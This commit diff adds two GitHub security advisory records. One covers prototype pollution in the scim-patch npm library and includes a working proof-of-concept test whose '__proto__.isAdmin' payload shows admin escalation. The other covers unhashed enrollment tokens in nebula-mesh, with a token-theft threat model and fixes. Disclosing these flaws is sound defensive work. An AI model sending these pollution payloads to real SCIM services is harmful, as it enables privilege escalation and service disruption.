Skip to content

Commit 10aa2cd

Browse files
1 parent 670908b commit 10aa2cd

2 files changed

Lines changed: 122 additions & 0 deletions

File tree

Lines changed: 64 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,64 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-9m6g-wc8r-q59c",
4+
"modified": "2026-06-22T22:57:48Z",
5+
"published": "2026-06-22T22:57:48Z",
6+
"aliases": [
7+
"CVE-2026-48170"
8+
],
9+
"summary": "scimPatch vulnerable to prototype pollution via unfiltered keys in patch",
10+
"details": "## Summary\n\n`scim-patch` performs prototype pollution when applying a SCIM PATCH operation whose `value` object contains a key like `\"__proto__.someProp\"`. After one such patch,\n`Object.prototype.someProp` is set process-wide, affecting every plain object in the Node process.\n\nAny service that calls `scimPatch()` on attacker-controlled JSON (i.e. any SCIM endpoint accepting `PATCH` from an external IdP) is exploitable on a stock Node runtime.\n\n## Impact\n\n- **Class:** Prototype pollution ([CWE-1321](https://cwe.mitre.org/data/definitions/1321.html))\n- **Affected versions:** `<= 0.9.0` (current HEAD `871b1e2`)\n- **Attack vector:** Network — sent as part of a normal SCIM `PATCH /Users/:id` request body.\n- **Privileges required:** Whatever the SCIM endpoint requires. For most integrations that's a provisioned IdP, which is \"low\" in CVSS terms (any authenticated provisioning client).\n- **Scope:** Changed — the bug is in a SCIM library but the side effect (`Object.prototype` mutation) leaks into the entire Node process.\n\nDownstream consequences depend on what other code reads from plain objects. Realistic outcomes observed in similar bugs:\n- **Privilege escalation** if any auth/middleware code checks `actor.isAdmin` / `req.user.admin` / similar boolean flags against a plain object that *expects* the key to be absent.\n- **Logic bypass / DoS** if any code branches on `obj.name`, `obj.type`, `obj.id` etc. against plain objects (e.g. `pg`'s prepared-statement naming check — a real incident at one consumer).\n- **Persistence:** lasts until the Node process restarts, so the blast radius is *every* request that container handles after the pollution.\n\n## Root cause\n\nIn `src/scimPatch.ts:415-427`, `addOrReplaceObjectAttribute` iterates the user-supplied `patch.value` with `Object.entries` and feeds each key to `resolvePaths`, which splits on `.`:\n\n```ts\nfunction addOrReplaceObjectAttribute(property: any, patch: ScimPatchAddReplaceOperation, multiValuedPathFilter?: boolean): any {\n if (typeof patch.value !== 'object') { ... }\n\n // src/scimPatch.ts:423-427\n for (const [key, value] of Object.entries(patch.value)) {\n assign(property, resolvePaths(key), value, patch.op);\n }\n return property;\n}\n```\n\n`assign` then walks the resulting key path with no filtering on dangerous keys (`src/scimPatch.ts:437-445`):\n\n```ts\nfunction assign(obj: any, keyPath: Array<string>, value: any, op: string) {\n const lastKeyIndex = keyPath.length - 1;\n for (let i = 0; i < lastKeyIndex; ++i) {\n const key = keyPath[i];\n if (!(key in obj)) {\n obj[key] = {};\n }\n obj = obj[key]; // ← obj[\"__proto__\"] === Object.prototype\n }\n // ... assigns into Object.prototype\n}\n```\n\nFor `keyPath = [\"__proto__\", \"polluted\"]`:\n- `\"__proto__\" in obj` is always true, so the fresh-object branch is skipped.\n- `obj = obj[\"__proto__\"]` now points to `Object.prototype`.\n- The final write lands on `Object.prototype.polluted`.\n\nThe same shape works for `constructor.prototype` keys.\n\n## Proof of concept\n\nDrop this in `test/prototypePollution.test.ts` and run `npm run build && npx mocha lib/test/prototypePollution.test.js`. Both tests pass against HEAD `871b1e2`:\n\n```ts\nimport { scimPatch } from '../src/scimPatch';\nimport { ScimUser } from './types/types.test';\nimport { expect } from 'chai';\n\ndescribe('Prototype pollution via scim-patch', () => {\n let scimUser: ScimUser;\n\n beforeEach(() => {\n scimUser = JSON.parse(`{\n \"schemas\": [\"urn:ietf:params:scim:schemas:core:2.0:User\"],\n \"id\": \"tea_4\",\n \"userName\": \"spiderman\",\n \"name\": { \"familyName\": \"Parker\", \"givenName\": \"Peter\" },\n \"active\": true,\n \"emails\": [{ \"value\": \"spiderman@superheroes.com\", \"primary\": true }],\n \"roles\": [],\n \"meta\": { \"resourceType\": \"User\", \"created\": \"x\", \"lastModified\": \"x\", \"location\": \"x\" }\n }`);\n });\n\n afterEach(() => {\n delete (Object.prototype as any).polluted;\n delete (Object.prototype as any).isAdmin;\n });\n\n it('pollutes Object.prototype via a value-key containing __proto__', () => {\n expect(({} as any).polluted).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: 'add',\n path: 'name',\n value: { '__proto__.polluted': 'yes' }\n }]);\n\n expect((Object.prototype as any).polluted).to.equal('yes');\n expect(({} as any).polluted).to.equal('yes');\n });\n\n it('elevates Object.prototype.isAdmin — the admin-escalation shape', () => {\n expect(({} as any).isAdmin).to.equal(undefined);\n\n scimPatch(scimUser, [{\n op: 'add',\n path: 'name',\n value: { '__proto__.isAdmin': true }\n }]);\n\n expect((Object.prototype as any).isAdmin).to.equal(true);\n expect(({} as any).isAdmin).to.equal(true);\n });\n});\n```\n\n## Suggested fix\n\nReject the three dangerous keys in `assign()` before the walk. Minimal patch:\n\n```ts\nconst DANGEROUS_KEYS = new Set(['__proto__', 'constructor', 'prototype']);\n\nfunction assign(obj: any, keyPath: Array<string>, value: any, op: string) {\n for (const key of keyPath) {\n if (DANGEROUS_KEYS.has(key)) {\n throw new InvalidScimPatchOp(`Forbidden key in patch path: ${key}`);\n }\n }\n // ... existing logic\n}\n```\n\nAlternative, slightly safer: switch the walk target to `Object.create(null)` nodes when creating intermediate objects, and use `Object.defineProperty(obj, key, { value, enumerable: true, configurable: true, writable: true })` instead of `obj[key] = value` for the final write. That defends against future prototype-walking sinks even if a key sneaks past the denylist.\n\nEither approach is a non-breaking change — legitimate SCIM clients never send these keys.\n\n## Mitigation for consumers who can't upgrade immediately\n\nCalling `Object.freeze(Object.prototype)` (and the same on `Array.prototype`, `Function.prototype`) at process startup neutralizes this class of bug — assignment to a frozen prototype becomes a silent no-op in sloppy mode or a `TypeError` in strict mode. Node's `--frozen-intrinsics` flag does this for built-ins automatically.\n\n## Credit\n\nDiscovered by **Lee Wang (Notion)**. Reported by **David Wu (Notion)**.\n\nReport authored by **Claude**. Reviewed by **David Wu**.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:L"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "scim-patch"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "0.9.1"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 0.9.0"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/thomaspoignant/scim-patch/security/advisories/GHSA-9m6g-wc8r-q59c"
45+
},
46+
{
47+
"type": "WEB",
48+
"url": "https://github.com/thomaspoignant/scim-patch/commit/260f9cd2ac5ceac3976978850bb47dcb391720f6"
49+
},
50+
{
51+
"type": "PACKAGE",
52+
"url": "https://github.com/thomaspoignant/scim-patch"
53+
}
54+
],
55+
"database_specific": {
56+
"cwe_ids": [
57+
"CWE-1321"
58+
],
59+
"severity": "CRITICAL",
60+
"github_reviewed": true,
61+
"github_reviewed_at": "2026-06-22T22:57:48Z",
62+
"nvd_published_at": null
63+
}
64+
}
Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-ghmh-jhmj-wcmf",
4+
"modified": "2026-06-22T22:57:27Z",
5+
"published": "2026-06-22T22:57:27Z",
6+
"aliases": [],
7+
"summary": "nebula-mesh's stores enrollment tokens unhashed in SQLite",
8+
"details": "`internal/store/sqlite.go:1177,1192,1221,1245` — the `enrollment_tokens.token` column holds the raw UUID token. `ConsumeToken` does `WHERE token = ?` against the raw string. Compare with `operator_api_keys.key_hash`, which is SHA-256 hex (constructed in `internal/api/middleware.go:51-53`).\n\n## Affected\nAll released versions up to v0.3.0.\n\n## Threat model\nRead access to `nebula-mgmt.db`: backup, snapshot, file-system access, future SQL-injection sink. The principle of defense-in-depth: API keys are hashed at rest; enrollment tokens — which grant the same lifecycle authority over a host's identity — are not.\n\nAn attacker who reads the DB before a legitimate agent enrolls can consume the single-use token first, mint a cert against their own keypair, and take the agent's intended Nebula identity.\n\n## Suggested fix\n1. Schema migration: rename `enrollment_tokens.token` → `token_hash` (or add the new column and drop the old after backfill of pending rows).\n2. Store SHA-256 of token on create:\n ```go\n sum := sha256.Sum256([]byte(token))\n row.TokenHash = hex.EncodeToString(sum[:])\n ```\n3. `ConsumeToken` accepts the raw token, hashes once, looks up by hash, atomically marks consumed.\n\nSide bonus: take this opportunity to switch the token format from `uuid.New().String()` (122 bits) to `hex.EncodeToString(crypto/rand 32 bytes)` (256 bits), matching the project's session-token and API-key conventions. UUIDs are recognisable in logs and crash dumps; opaque hex blends in.\n\nTOTP recovery codes appear to already be SHA-256 hashed at rest (`internal/web/totp.go:74-78`) — confirming that pattern is intentional elsewhere, just missed here.",
9+
"severity": [
10+
{
11+
"type": "CVSS_V4",
12+
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
13+
}
14+
],
15+
"affected": [
16+
{
17+
"package": {
18+
"ecosystem": "Go",
19+
"name": "github.com/juev/nebula-mesh"
20+
},
21+
"ranges": [
22+
{
23+
"type": "ECOSYSTEM",
24+
"events": [
25+
{
26+
"introduced": "0"
27+
},
28+
{
29+
"fixed": "0.3.2"
30+
}
31+
]
32+
}
33+
],
34+
"database_specific": {
35+
"last_known_affected_version_range": "<= 0.3.1"
36+
}
37+
}
38+
],
39+
"references": [
40+
{
41+
"type": "WEB",
42+
"url": "https://github.com/juev/nebula-mesh/security/advisories/GHSA-ghmh-jhmj-wcmf"
43+
},
44+
{
45+
"type": "PACKAGE",
46+
"url": "https://github.com/juev/nebula-mesh"
47+
}
48+
],
49+
"database_specific": {
50+
"cwe_ids": [
51+
"CWE-312"
52+
],
53+
"severity": "MODERATE",
54+
"github_reviewed": true,
55+
"github_reviewed_at": "2026-06-22T22:57:27Z",
56+
"nvd_published_at": null
57+
}
58+
}

0 commit comments

Comments
 (0)